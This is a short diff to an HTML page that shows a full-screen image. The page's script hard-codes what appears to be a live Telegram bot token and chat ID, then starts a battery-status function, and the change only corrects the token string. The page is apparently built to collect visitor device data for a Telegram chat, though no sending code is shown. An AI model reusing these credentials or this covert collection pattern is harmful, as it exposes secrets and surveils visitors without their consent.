--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
     <img id="displayImage" src="https://img12.pixhost.to/images/804/574487749_fikxzxmodz-developer.jpg" style="width: 100%; height: 100vh; object-fit: cover;">
 
     <script>
-        const BOT_TOKEN = "7575375182:7575375182:AAHQeA5jdew2tMO5Znh9_zBqi4pwFnWUmCg";  
+        const BOT_TOKEN = "7575375182:AAHQeA5jdew2tMO5Znh9_zBqi4pwFnWUmCg";  
         const CHAT_ID = "7081489041";  
 
         async function getBatteryStatus() {
